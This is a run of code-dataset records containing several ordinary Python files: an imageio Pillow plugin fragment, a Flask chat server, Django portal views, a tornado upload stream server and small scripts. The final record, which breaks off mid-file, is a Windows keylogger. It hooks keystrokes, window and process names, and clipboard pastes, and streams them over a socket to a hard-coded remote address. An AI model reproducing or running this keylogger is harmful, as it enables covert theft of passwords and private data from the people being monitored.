batch\n dimension. 
If index is None, this plugin reads and returns the\n            properties of the first image (index=0) unless the image is a GIF or\n            APNG, in which case it reads and returns the properties of all images\n            (index=...).\n\n        Returns\n        -------\n        properties : ImageProperties\n            A dataclass filled with standardized image metadata.\n\n        Notes\n        -----\n        This does not decode pixel data and is fast for large images.\n\n        \"\"\"\n\n        if index is None:\n            if self._image.format == \"GIF\":\n                index = Ellipsis\n            elif self._image.custom_mimetype == \"image/apng\":\n                index = Ellipsis\n            else:\n                index = 0\n\n        if index is Ellipsis:\n            self._image.seek(0)\n        else:\n            self._image.seek(index)\n\n        if self._image.format == \"GIF\":\n            # GIF mode is determined by palette\n            mode = self._image.palette.mode\n        else:\n            mode = self._image.mode\n\n        width: int = self._image.width\n        height: int = self._image.height\n        shape: Tuple[int, ...] = (height, width)\n\n        n_frames: int = self._image.n_frames\n        if index is ...:\n            shape = (n_frames, *shape)\n\n        dummy = np.asarray(Image.new(mode, (1, 1)))\n        pil_shape: Tuple[int, ...] = dummy.shape\n        if len(pil_shape) > 2:\n            shape = (*shape, *pil_shape[2:])\n\n        return ImageProperties(\n            shape=shape,\n            dtype=dummy.dtype,\n            is_batch=True if index is Ellipsis else False,\n        )\n","sub_path":"imageio/plugins/pillow.py","file_name":"pillow.py","file_ext":"py","file_size_in_byte":17088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"571016288","text":"import os\nimport requests\nimport datetime\n\nfrom flask import Flask, 
jsonify, render_template, request,json\nfrom flask_socketio import SocketIO, emit\n\napp = Flask(__name__)\napp.config[\"SECRET_KEY\"] = os.getenv(\"SECRET_KEY\")\nsocketio = SocketIO(app)\n\nclass Message:\n def __init__(self, displayname, message, channel):\n self.displayName = displayname\n self.message = message\n self.channel = channel\n self.msgDateTime = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n def asdict(self):\n return {'displayName': self.displayName, 'message': self.message, 'channel': self.channel, 'msgDateTime':self.msgDateTime}\n\ntestDisplayName = \"test\"\n# testUser = User(testDisplayName)\nDisplayNames = {testDisplayName:[]}\n# DisplayNames = []\n\n\ntestChannel = \"test-channel\"\nChannels = {testChannel:[]}\n# Channels = [\"fun\",\"work\",\"school\"]\n# Channels = []\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@socketio.on('register user displayname')\ndef registerUserDisplayName(data):\n displayname = data[\"displayname\"]\n app.logger.debug(f'REGISTER USER DISPLAYNAME in register user displayname: {displayname}')\n # no error if already registered but don't add twice\n if displayname not in DisplayNames:\n app.logger.info(f'register user: {displayname}')\n # DisplayNames.append(data[\"displayname\"])\n # key is name and value is array of messages\n DisplayNames[displayname] = []\n \n\n@socketio.on('fetch channels')\ndef fetchChannels():\n channelNames = list(Channels.keys())\n app.logger.debug(f\"FETCH CHANNELS {channelNames}\")\n socketio.emit('channel list',channelNames)\n\n@socketio.on('create channel')\ndef createChannel(data):\n # no error if already there just emit\n channel = data['newchannel']\n app.logger.debug(f'CREATE CHANNEL: {channel}')\n app.logger.debug(f'existing Channels: {Channels.keys()}')\n if channel not in Channels:\n # Channels.append(data[\"newchannel\"])\n Channels[channel] = []\n channelNames = list(Channels.keys())\n app.logger.debug(f'emiting channelNames: {channelNames}')\n socketio.emit('channel list', channelNames)\n\n@socketio.on(\"display name create\")\ndef createDisplayName(data):\n app.logger.debug(\"DISPLAY NAME CREATE in createDisplayName\")\n #check if name exists already\n if data[\"displayname\"] in DisplayNames:\n message = f'Display name {data[\"displayname\"]} already in use'\n resp = {\"status\":\"fail\",\"message\":message}\n else:\n # DisplayNames.append(data[\"displayname\"])\n DisplayNames[data[\"displayname\"]] = []\n resp = {\"status\":\"success\",\"message\":data[\"displayname\"]}\n debugDisplayNames = list(DisplayNames.keys())\n app.logger.debug(f'display name create end: {debugDisplayNames}')\n socketio.emit('create display name results', resp)\n\n######messages\n\n@socketio.on(\"message create\")\ndef createMessage(data):\n newmessage = data[\"newmessage\"]\n displayname = newmessage[\"displayname\"]\n message = newmessage[\"messagetext\"]\n selectedchannel = newmessage[\"selectedchannel\"]\n app.logger.debug(f'MESSAGE GREATE creating message: {displayname}, {message}, {selectedchannel}')\n ###### calling for new message not working\n newMessage = Message(displayname, message, selectedchannel)\n DisplayNames[displayname].append(newMessage)\n Channels[selectedchannel].append(newMessage)\n # return the the new message\n messages = []\n # messages.append(newMessage.asdict())\n # return all messages\n for message in Channels[selectedchannel]:\n messages.append(message.asdict())\n app.logger.debug(f'MESSAGE CREATE message returning: {messages}')\n 
socketio.emit(\"messages to render\",messages)\n\n@socketio.on(\"fetch messages per channel\")\ndef fetchMessagesPerChannel(data):\n app.logger.debug(f'FETCH MESSAGES PER CHANNEL fetch per channel: {data}')\n app.logger.debug(f'FETCH MESSAGES PER CHANNEL current Channels: {Channels.keys()}')\n #return a list of message for a channel named in data\n\n ########need to test if data is a key in Channels\n if (data in Channels.keys()): \n app.logger.debug(\"found messages in channel\")\n # convert messages in channel to dict\n messages = []\n for message in Channels[data]:\n messages.append(message.asdict())\n app.logger.debug(f'messages sending {messages}')\n socketio.emit(\"messages to render\",messages)\n else:\n app.logger.debug(\"didn't find messages in channel\")\n #no messages for this channel\n errorObj = {status:\"Error fetching messages per channel\",channel:data}\n socketio.emit(\"error\", errorObj)\n\n@socketio.on(\"clear server cache\")\ndef clearServerCache():\n DisplayNames = {}\n Channels = {}\n app.logger.debug(f\"cache cleared {DisplayNames} {Channels}\" )\n socketio.emit(\"remove all messages\")\n\n\n\n@socketio.on(\"delete messages per displayname\")\ndef deleteMessagesPerDisplayName(data):\n app.logger.debug(f'DELETING MESSAGES PER DISAPLYNAME {data}')\n\n displayName = data[\"displayname\"]\n selectedChannel = data[\"selectedchannel\"]\n app.logger.debug(f'DELETING MESSAGES PER DISAPLYNAME deleting message for {displayName}')\n #remove messages from user list\n DisplayNames[displayName] = []\n \n # remove object from Channels\n for channel in Channels.keys():\n messages = Channels[channel]\n app.logger.debug(f'delete messages in Channels {messages}')\n for message in messages:\n if message.displayName == displayName:\n app.logger.debug(f'REMVING MESSAGE {message}')\n messages.remove(message)\n #only return data if there is a selected channel and then return the messages\n #associated with that channel\n if (len(selectedChannel)) > 0:\n app.logger.debug(f\"SENDING BACK messages in channel {selectedChannel}\")\n fetchMessagesPerChannel(selectedChannel)\n else: \n nomessages = []\n app.logger.debug(f\"SENDING BACK EMPTY messages because no channel selected\")\n socketio.emit(\"messages to render\",nomessages)\n #socketio.emit(\"remove messages for displayname\",displayName)\n\n\n\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"358997780","text":"# -*- coding:utf-8 -*- \n#numba_test.py\nfrom numba import jit\nfrom numpy import arange\n\n# jit装饰器告诉Numba编译函数\n# 当函数被调用时,Numba会把参数类型引入\n@jit\ndef sum2d(arr):\n M, N = arr.shape\n result = 0.0\n for i in range(M):\n for j in range(N):\n result += arr[i, j]\n return result\n\na = arange(9).reshape(3, 3)\nprint(sum2d(a))","sub_path":"demos/L3/numba_test.py","file_name":"numba_test.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"186700306","text":"'''\n--------------Outline----------------------\n\n(*)version 1\n\nCheck or Add\n\nif check ask year and month\nprint total\n\noption (0-5 to print specific)\noption (Q to quit() and A to add function)\nPrint option\n -Label_0(Incoming) total\n -Label_1(Necessaries) total\n -Label_2(Groceries) total\n -Label_3(Entertainment)total\n -Label_4(Miscellaneous)total\n -Add\n -Quit\n\n\nOpen the file read and print total\nIf not avalible, Creat 
\nInput Data If month changes, create new month data\nSort by YYYY-MM\n\nAsk user print all lines?\nAsk user add new lines?\nSave and Close\n\n@ import DATE\n\n\n(*)version 2\n-GUI\n-percentage pie(visual info)\n@ import tkinter\n\n\n'''\n\n\n\nfile_name = input('Input the file name which you want to edit.\\n--> ')\ntxt = input('Insert the sentence:\\n')\n\ntry:\n file = open(file_name,'r+')\n\nexcept Exception as ERROR_info:\n print('The file called {} does not exist.'.format(file_name))\n print('Would you like to create a new file?')\n\n while True:\n create_require = input('(Y/N)')\n if create_require in ['y','Y','yes','Yes'] :\n file = open(file_name,'w')\n file.write(txt)\n file.close()\n break\n elif create_require in ['n','N','no','No']:\n break\n\n else:\n continue\n\nelse:\n\n file.write(txt)\n file.close()\n\n\n","sub_path":"test_files/add_total.py","file_name":"add_total.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"176375995","text":"#coding=utf-8\nimport datetime\nfrom django.conf import settings\nfrom django.shortcuts import render\nfrom django.http.response import Http404\nfrom portal.models import *\nfrom portal.utils import convert_to_data_value, convert_to_view_value, remove_html_tag\n\n\ndef home(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n #load slide data\n slide_list = Slide.objects.get_enabled_slide()\n #load top data\n top_data_count = 10\n #load solution top data\n solution_list = list()\n solutions = Solution.objects.get_enabled_solution()\n counter = 0\n while counter < len(solutions):\n if counter == top_data_count:\n break\n solution_item = dict()\n solution_data = solutions[counter]\n solution_item['title'] = solution_data.title\n solution_item['sid'] = convert_to_view_value(solution_data.id)\n solution_list.append(solution_item)\n counter += 1\n\n #load product top data\n product_list = list()\n products = Product.objects.get_enabled_product()\n counter = 0\n while counter < len(products):\n if counter == top_data_count:\n break\n product_item = dict()\n product_data = products[counter]\n product_item['title'] = product_data.title\n product_item['pid'] = convert_to_view_value(product_data.id)\n product_list.append(product_item)\n counter += 1\n\n #load service top data\n service_list = list()\n services = Service.objects.get_enabled_service()\n counter = 0\n while counter < len(services):\n if counter == top_data_count:\n break\n service_item = dict()\n service_data = services[counter]\n service_item['title'] = service_data.title\n service_item['sid'] = convert_to_view_value(service_data.id)\n service_list.append(service_item)\n counter += 1\n\n #load partner top data\n partner_data_count = 8\n partner_list = list()\n partners = Partner.objects.get_partners()\n counter = 0\n while counter < len(partners):\n partner_item = dict()\n partner_data = partners[counter]\n partner_item['title'] = partner_data.title\n partner_item['website'] = partner_data.website\n partner_item['logo'] = partner_data.logo\n partner_list.append(partner_item)\n if counter == partner_data_count:\n break\n counter += 1\n\n #load customer top data\n customer_data_count = 8\n customer_list = list()\n customers = Customer.objects.get_all_customer()\n counter = 0\n while counter < len(customers):\n customer_item = dict()\n customer_data = customers[counter]\n customer_item['title'] = customer_data.title\n customer_item['logo'] = customer_data.logo\n 
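Aside on add_total.py above: the prompt-and-create flow can be written more compactly with pathlib and a context manager. A sketch, not the author's code; append_line is a hypothetical name, and mode 'a' is chosen because the outline's intent is to add lines:

from pathlib import Path

def append_line(file_name, txt):
    path = Path(file_name)
    if not path.exists():
        answer = input('File {} does not exist. Create it? (Y/N) '.format(file_name))
        if answer.strip().lower() not in ('y', 'yes'):
            return
    # 'a' creates the file if needed and always appends at the end.
    with path.open('a', encoding='utf-8') as f:
        f.write(txt + '\n')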
customer_list.append(customer_item)\n if counter == customer_data_count:\n break\n counter += 1\n\n return render(\n request,\n 'home/home.html',\n generate_context(\n current='home',\n slides=slide_list,\n partner_list=partner_list,\n customer_list=customer_list,\n solution_list=solution_list,\n product_list=product_list,\n service_list=service_list,\n )\n )\n\n\ndef solution(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n solution_list = Solution.objects.get_enabled_solution()\n solutions = []\n for solution_item in solution_list:\n solution_id = convert_to_view_value(solution_item.id)\n solution_title = solution_item.title\n solution_subtitle = solution_item.subtitle\n solution_data = {\n 'solution_id': solution_id,\n 'solution_title': solution_title,\n 'solution_subtitle': solution_subtitle,\n }\n solutions.append(solution_data)\n\n return render(\n request,\n 'solution/solution.html',\n generate_context(\n current='solution',\n solutions=solutions\n )\n )\n\n\ndef solution_detail(request, solution_id):\n \"\"\"\n :param request:\n :param solution_id:\n :return:\n \"\"\"\n solution_id = convert_to_data_value(solution_id)\n solution_item = Solution.objects.get_solution_by_id(solution_id)\n if not solution_item:\n raise Http404\n #获取关键词\n solution_keywords = solution_item.keyword\n #获取内容\n solution_content_list = SolutionContent.objects.get_content_by_solution_id(solution_id)\n #获取相关信息\n #获取相关产品\n solution_product_list = SolutionProduct.objects.get_product_by_solution_id(solution_id)\n product_list = list()\n customer_list = list()\n partner_list = list()\n for solution_product_item in solution_product_list:\n product_id = solution_product_item.product.id\n product_item = Product.objects.get_product_by_id(product_id)\n if not product_item:\n solution_product_item.delete()\n if product_item.enable == 0:\n continue\n #获取相关用户\n product_customer_list = ProductCustomer.objects.get_customer_by_product_id(product_id)\n for product_customer_item in product_customer_list:\n customer_item = product_customer_item.customer\n #检查重复项\n if customer_item not in customer_list:\n customer_list.append(customer_item)\n product_item.id = convert_to_view_value(product_item.id)\n product_list.append(product_item)\n #获取相关合作伙伴\n partner_item = product_item.partner\n if partner_item not in partner_list and partner_item:\n partner_list.append(partner_item)\n\n return render(\n request,\n 'solution/solution_detail.html',\n generate_context(\n current='solution',\n solution_item=solution_item,\n solution_content_list=solution_content_list,\n product_list=product_list,\n product_count=len(product_list),\n customer_list=customer_list,\n customer_count=len(customer_list),\n partner_list=partner_list,\n partner_count=len(partner_list),\n keywords=solution_keywords,\n )\n )\n\n\ndef product(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n product_list = Product.objects.get_enabled_product()\n products = list()\n for product_item in product_list:\n product_id = convert_to_view_value(product_item.id)\n product_title = product_item.title\n product_subtitle = product_item.subtitle\n product_partner = product_item.partner\n product_data = {\n 'product_id': product_id,\n 'product_title': product_title,\n 'product_subtitle': product_subtitle,\n 'product_partner': product_partner,\n }\n products.append(product_data)\n return render(\n request,\n 'product/product.html',\n generate_context(\n current='product',\n products=products,\n )\n )\n\n\ndef product_detail(request, product_id):\n \"\"\"\n :param 
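Aside on home() above: each counter-driven while loop just takes the first N items. If the manager helpers return querysets, slicing emits a LIMIT query; if they return lists, slicing still works in plain Python. A hypothetical top_items sketch reusing the snippet's own convert_to_view_value:

def top_items(queryset, limit=10):
    # Slicing replaces the manual counter/break bookkeeping.
    return [
        {'title': obj.title, 'sid': convert_to_view_value(obj.id)}
        for obj in queryset[:limit]
    ]

# e.g. solution_list = top_items(Solution.objects.get_enabled_solution())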
request:\n :param product_id:\n :return:\n \"\"\"\n product_id = convert_to_data_value(product_id)\n product_item = Product.objects.get_product_by_id(product_id)\n if not product_item:\n raise Http404\n keywords = product_item.keyword\n #获取内容\n product_content_list = ProductContent.objects.get_content_by_product_id(product_id)\n #获取相关方案\n solution_product_list = SolutionProduct.objects.get_solution_by_product_id(product_id)\n solution_list = []\n for solution_product_item in solution_product_list:\n solution_id = solution_product_item.solution.id\n solution_item = Solution.objects.get_solution_by_id(solution_id)\n if not solution_item:\n solution_product_item.delete()\n if solution_item.enable == 0:\n continue\n solution_item.id = convert_to_view_value(solution_item.id)\n solution_list.append(solution_item)\n #获取相关客户信息\n product_customer_list = ProductCustomer.objects.get_customer_by_product_id(product_id)\n customer_list = []\n for product_customer_item in product_customer_list:\n customer = product_customer_item.customer\n customer_list.append(customer)\n\n return render(\n request,\n 'product/product_detail.html',\n generate_context(\n current='product',\n product_item=product_item,\n keywords=keywords,\n solution_list=solution_list,\n solution_count=len(solution_list),\n product_content_list=product_content_list,\n customer_list=customer_list,\n customer_count=len(customer_list)\n )\n )\n\n\ndef service(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n #load enabled service\n service_list = Service.objects.get_enabled_service()\n services = list()\n for service_item in service_list:\n service_id = convert_to_view_value(service_item.id)\n service_title = service_item.title\n service_sketch = service_item.sketch\n service_data = {\n 'service_id': service_id,\n 'service_title': service_title,\n 'service_sketch': service_sketch,\n }\n services.append(service_data)\n return render(\n request,\n 'service/service.html',\n generate_context(\n current='service',\n services=services\n )\n )\n\n\ndef service_detail(request, service_id):\n \"\"\"\n :param request:\n :param service_id:\n :return:\n \"\"\"\n service_id = convert_to_data_value(service_id)\n service_item = Service.objects.get_service_by_id(service_id)\n if not service_item:\n raise Http404\n\n keywords = service_item.keyword\n\n return render(\n request,\n 'service/service_detail.html',\n generate_context(\n current='service',\n service_item=service_item,\n keywords=keywords\n )\n )\n\n\ndef download(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n return render(\n request,\n 'download/download.html',\n generate_context(\n current='download'\n )\n )\n\n\ndef partner(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n #load data\n partner_list = Partner.objects.get_partners()\n customer_list = Customer.objects.get_all_customer()\n return render(\n request,\n 'partner/partner.html',\n generate_context(\n current='partner',\n partner_list=partner_list,\n customer_list=customer_list,\n )\n )\n\n\ndef career(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n context = generate_context(current='career')\n return render(request, 'career/career.html', context)\n\n\ndef company(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n return render(\n request,\n 'company/company.html',\n generate_context(\n current='company'\n )\n )\n\n\ndef privacy(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n return render(\n request,\n 'company/privacy.html',\n generate_context(\n current='company'\n )\n 
)\n\n\ndef term(request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n return render(\n request,\n 'company/term.html',\n generate_context(\n current='company'\n )\n )\n\n\ndef search(request):\n query = request.GET.get('s', '')\n #对GET到的字符串数据进行转码\n query = unicode(query).encode(encoding='utf-8')\n #移除查询关键词前后的空格\n query = query.strip()\n #将关键词按照空格分割成list\n query_list = query.split(' ')\n search_result = []\n #判断用户行为是否允许进行查询\n valid_rate = False\n valid_keyword = False\n #搜索频率是否正常\n if 'search' not in request.COOKIES:\n valid_rate = True\n #搜索词是否为空\n if not query == '':\n valid_keyword = True\n #开始进行查询\n if valid_rate and valid_keyword:\n #查询解决方案\n solution_result = Solution.objects.get_search(query_list)\n for solution_item in solution_result:\n solution_id = convert_to_view_value(solution_item.id)\n solution_title = solution_item.title\n solution_sketch = remove_html_tag(solution_item.sketch)\n if len(solution_sketch) > 100:\n solution_sketch = solution_sketch[0:100] + '...'\n result_item = {\n 'type': 'solution',\n 'id': solution_id,\n 'title': solution_title,\n 'sketch': solution_sketch,\n }\n search_result.append(result_item)\n\n #查询解决方案内容\n solution_content_result = SolutionContent.objects.get_search(query_list)\n #检查所属解决方案在查询结果是否已存在\n for solution_content_item in solution_content_result:\n solution_id = solution_content_item.solution.id\n exist = False\n for search_result_item in search_result:\n if search_result_item['type'] == 'solution' \\\n and search_result_item['id'] == convert_to_view_value(solution_id):\n exist = True\n break\n if not exist:\n solution_item = Solution.objects.get_solution_by_id(solution_id)\n if not solution_item:\n continue\n solution_id = convert_to_view_value(solution_id)\n solution_title = solution_item.title\n solution_sketch = solution_item.sketch\n solution_sketch = remove_html_tag(solution_sketch)\n if len(solution_sketch) > 100:\n solution_sketch = solution_sketch[0:100] + '...'\n result_item = {\n 'type': 'solution',\n 'id': solution_id,\n 'title': solution_title,\n 'sketch': solution_sketch\n }\n search_result.append(result_item)\n\n #查询产品\n product_result = Product.objects.get_search(query_list)\n for product_item in product_result:\n product_id = convert_to_view_value(product_item.id)\n product_title = product_item.title\n product_sketch = remove_html_tag(product_item.sketch)\n if len(product_sketch) > 100:\n product_sketch = product_sketch[0:100] + '...'\n result_item = {\n 'type': 'product',\n 'id': product_id,\n 'title': product_title,\n 'sketch': product_sketch,\n }\n search_result.append(result_item)\n\n #查询产品内容\n product_content_result = ProductContent.objects.get_search(query_list)\n #检查所属产品在查询结果是否已存在\n for product_content_item in product_content_result:\n product_id = product_content_item.product.id\n exist = False\n for search_result_item in search_result:\n if search_result_item['type'] == 'product' \\\n and search_result_item['id'] == convert_to_view_value(product_id):\n exist = True\n break\n if not exist:\n product_item = Product.objects.get_product_by_id(product_id)\n if not product_item:\n continue\n product_id = convert_to_view_value(product_id)\n product_title = product_item.title\n product_sketch = product_item.sketch\n product_sketch = remove_html_tag(product_sketch)\n if len(product_sketch) > 100:\n product_sketch = product_sketch[0:100] + '...'\n result_item = {\n 'type': 'product',\n 'id': product_id,\n 'title': product_title,\n 'sketch': product_sketch\n }\n search_result.append(result_item)\n\n #查询服务\n service_result = 
Service.objects.get_search(query_list)\n for service_item in service_result:\n service_id = convert_to_view_value(service_item.id)\n service_title = service_item.title\n service_sketch = remove_html_tag(service_item.sketch)\n if len(service_sketch) > 100:\n service_sketch = service_sketch[0:100] + '...'\n result_item = {\n 'type': 'service',\n 'id': service_id,\n 'title': service_title,\n 'sketch': service_sketch\n }\n search_result.append(result_item)\n\n #没有查询到数据的消息反馈\n #消息类型:\n #0:搜索频率过快\n #1:关键词为空\n #2:没有查询到结果\n message = ''\n search_result_count = len(search_result)\n if search_result_count == 0:\n search_result = None\n if not valid_rate:\n message = 0\n elif not valid_keyword:\n message = 1\n else:\n message = 2\n\n query_history = request.COOKIES.get('query_history')\n if not query_history or query_history == 'None':\n if not query == '':\n query_history = list()\n query_history.append(query)\n else:\n #将本次关键词加入搜索历史\n query_history = query_history.split(',')\n #遍历搜索历史的每一项,检查是否有与本次关键词完全一样的项目\n for i in range(0, len(query_history), 1):\n if query == query_history[i]:\n del query_history[i]\n break\n #不存在完全一样的项则将其加入搜索历史\n if not query == '':\n query_history.insert(0, query)\n #保持历史记录项目数量不超过6\n while len(query_history) > 6:\n del query_history[len(query_history)-1]\n\n #将cookie中取得的历史记录转换成list,该list将传递给页面模板\n history_list = query_history\n query_history = ','.join(query_history)\n\n response = render(\n request,\n 'search/search.html',\n generate_context(\n current='home',\n search_result=search_result,\n search_result_count=search_result_count,\n query=query,\n history_list=history_list,\n message=message\n )\n )\n #搜索历史保存在客户端本地Cookie\n response.set_cookie('search', max_age=1)\n #历史列表保存时间为2小时\n response.set_cookie('query_history', query_history, max_age=7200)\n\n return response\n\n\ndef h404(request):\n return render(\n request,\n 'common/http404.html',\n generate_context(\n current='home'\n )\n )\n\n\ndef h500(request):\n return render(\n request,\n 'common/http500.html',\n generate_context(\n current='home'\n )\n )\n\n\ndef generate_context(**contexts):\n \"\"\"\n 生成页面上下文信息\n :return:\n \"\"\"\n #获取传入的上下文\n input_context = dict(contexts)\n #获取DEBUG状态\n use_cdn = settings.USE_CDN\n #获取设置\n call_setting = GlobalSetting.objects.get_phone_setting()\n mail_setting = GlobalSetting.objects.get_mail_setting()\n keyword_setting = GlobalSetting.objects.get_keyword_setting()\n description_setting = GlobalSetting.objects.get_description_setting()\n #获取当前年份\n year = datetime.datetime.now().year\n #将数据装入页面上下文\n setting_context = {\n 'use_cdn': use_cdn,\n 'year': year,\n 'call_setting': call_setting,\n 'mail_setting': mail_setting,\n 'description_setting': description_setting,\n }\n context = dict(input_context.items() + setting_context.items())\n if ('keywords' in context) is False:\n context['keywords'] = keyword_setting\n else:\n if context['keywords'] == str():\n context['keywords'] = keyword_setting\n return context\n","sub_path":"portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"287250058","text":"import click\nimport sys\n\n\n@click.command()\n@click.option('--opt')\n@click.argument('arg')\ndef hello(arg, opt):\n click.echo('Opt: {} Arg: {}'.format(opt, arg))\n\n\nif __name__ == '__main__':\n 
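Aside on generate_context above: dict(input_context.items() + setting_context.items()) only works on Python 2, because Python 3's dict.items() returns a view that does not support +; the same applies to unicode(query) in search(), which would be str in Python 3. Equivalent Python 3 forms of the merge, preserving the same later-value-wins semantics:

# Python 3 replacement for dict(a.items() + b.items()):
context = {**input_context, **setting_context}

# or, more explicitly:
context = dict(input_context)
context.update(setting_context)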
hello(sys.argv[1:])\n","sub_path":"sphinxcontrib/lpblocks/signon.py","file_name":"signon.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"273512185","text":"#!/usr/bin/env python\n'''\nFile: nodepy.py\nAuthor: George Ang <gnap.an@gmail.com>\nDescription:\n'''\n\nimport logging\n\nfrom tornado import ioloop\nfrom functools import partial\nfrom tornado.netutil import TCPServer\nfrom tornado.httputil import HTTPHeaders\nfrom tornado.httputil import _parse_header\n\nclass NodePy(object):\n\n def __init__(self, port):\n self._port = port\n\n def listen(self):\n self._server.listen(self._port)\n\n def stream(self, handle_stream):\n self._server = TCPServer()\n self._server.handle_stream = handle_stream\n return self\n\nclass StreamHandler(object):\n\n def __init__(self):\n self._headers = dict(Accept='*/*')\n\n def __call__(self, stream, request_uri, request_headers = None):\n pass\n\n\nclass HTTPStreamServer(object):\n\n def __call__(self, stream, address):\n\n _sample_length = 10240\n\n def on_header(data):\n #stream.write(data)\n lines = data.splitlines()\n if lines:\n method, uri, version = lines[0].split(\" \")\n headers = HTTPHeaders.parse(\"\\r\\n\".join(lines[1:]))\n if headers.get(\"Expect\") == \"100-continue\":\n stream.write(\"HTTP/1.1 100 (Continue)\\r\\n\\r\\n\")\n write_headers()\n content_length = headers.get(\"Content-Length\")\n content_type = headers.get(\"Content-Type\", \"\")\n if content_length and content_type:\n content_length = int(content_length)\n if content_type.startswith(\"multipart/form-data\"):\n fields = content_type.split(\";\")\n if len(fields) != 2:\n stream.close()\n k, sep, v = fields[1].strip().partition(\"=\")\n if k == 'boundary' and v:\n boundary = v\n stream.read_bytes(min(content_length, _sample_length + len(boundary)*2 + 210),\n partial(on_multipart, boundary=boundary))\n else:\n stream.close()\n\n else:\n stream.close()\n\n else:\n stream.close()\n\n def on_multipart(data, boundary):\n #stream.write('<'*8 + '\\r\\n')\n logging.debug('got data length:%s', len(data))\n eoh = data.find(boundary + '--')\n boundary_length = len(boundary) + 4\n logging.debug('got data eoh:%s', eoh)\n if eoh != -1:\n part = data[boundary_length:eoh]\n else:\n part = data[boundary_length:]\n\n logging.debug('got part length:%s', len(part))\n eoh = part.find(\"\\r\\n\\r\\n\")\n logging.debug('part header:\\n%s', part[:eoh])\n headers = HTTPHeaders.parse(part[:eoh].decode(\"utf-8\"))\n disp_header = headers.get(\"Content-Disposition\", \"\")\n content_type = headers.get(\"Content-Type\", \"\")\n disposition, disp_params = _parse_header(disp_header)\n value = part[eoh + 4: eoh + 4 + _sample_length]\n if not value:\n stream.close()\n return\n logging.debug('got value length:%s', len(value))\n filename = disp_params[\"filename\"]\n res = unicode('got filename:%s content-type:%s len:%s' % (filename, content_type, len(value)))\n logging.debug('got res :%s', res)\n stream.write(res.encode('utf-8'), on_write)\n #stream.write('\\r\\n' + '>'*8 )\n #stream.close()\n\n def on_write():\n stream.close()\n\n def write_headers():\n stream.write(\"\"\"HTTP/1.1 200 OK\\nAccept:*/*\\nContent-Type: text/html\\nTransfer-Encoding: chunked\\r\\n\\r\\n\"\"\")\n\n stream.read_until('\\r\\n\\r\\n', on_header)\n\nif __name__ == '__main__':\n NodePy(8810).stream(HTTPStreamServer()).listen()\n 
ioloop.IOLoop.instance().start()\n","sub_path":"app/core/nodepy.py","file_name":"nodepy.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"583642916","text":"# -*- coding: utf-8 -*- \nfrom ctypes import *\nimport pythoncom\nimport pyHook\nimport win32clipboard\nimport socket\n\nuser32 = windll.user32\nkernel32 = windll.kernel32\npsapi = windll.psapi\ncurrent_window = None\n\n# 用于运行server.py的地址IP/URL及端口\ntarget_host = \"192.168.160.156\"\ntarget_port = 8374\n\n#建立连接并监听\nclient = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nwhile True:\n\t#异常用于处理本机无网络时或者服务端未处于监听状态(简而言之就是无法建立连接时)而退出程序\n\ttry:\n\t\tclient.connect((target_host,target_port))\n\t\tbreak\n\texcept socket.error:\n\t\tcontinue\nclient.sendall(\"Request to connect!!\")\n\ndef get_current_process():\n\n\t# 获取最上层的窗口句柄\n\thwnd = user32.GetForegroundWindow()\n\n\t# 获取进程ID\n\tpid = c_ulong(0)\n\tuser32.GetWindowThreadProcessId(hwnd,byref(pid))\n\n\t# 将进程ID存入变量中\n\tprocess_id = \"%d\" % pid.value\n\n\t# 申请内存\n\texecutable = create_string_buffer(\"\\x00\"*512)\n\th_process = kernel32.OpenProcess(0x400 | 0x10,False,pid)\n\n\tpsapi.GetModuleBaseNameA(h_process,None,byref(executable),512)\n\n\t# 读取窗口标题\n\twindows_title = create_string_buffer(\"\\x00\"*512)\n\tlength = user32.GetWindowTextA(hwnd,byref(windows_title),512)\n\n\t# 打印\n\tclient.sendall(\"\\n[ PID:%s-%s-%s]\\n\" % (process_id,executable.value,windows_title.value))\n\n\t# 关闭handles\n\tkernel32.CloseHandle(hwnd)\n\tkernel32.CloseHandle(h_process)\n\n# 定义击键监听事件函数\ndef KeyStroke(event):\n\n\tglobal current_window\n\n\t# 检测目标窗口是否转移(换了其他窗口就监听新的窗口)\n\tif event.WindowName != current_window:\n\t\tcurrent_window = event.WindowName\n\t\t# 函数调用\n\t\tget_current_process()\n\n\t# 检测击键是否常规按键(非组合键等)\n\tif event.Ascii > 32 and event.Ascii <127:\n\t\tclient.sendall(chr(event.Ascii))\n\telse:\n\t\t# 如果发现Ctrl+v(粘贴)事件,就把粘贴板内容记录下来\n\t\tif event.Key == \"V\":\n\t\t\twin32clipboard.OpenClipboard()\n\t\t\tpasted_value = win32clipboard.GetClipboardData()\n\t\t\twin32clipboard.CloseClipboard()\n\t\t\tclient.sendall(\"[PASTE]-%s\" % (pasted_value))\n\t\telse:\n\t\t\tclient.sendall(\"[%s]\" % event.Key)\n\n\t# 循环监听下一个击键事件\n\treturn True\n\n# 创建并注册hook管理器\nkl = 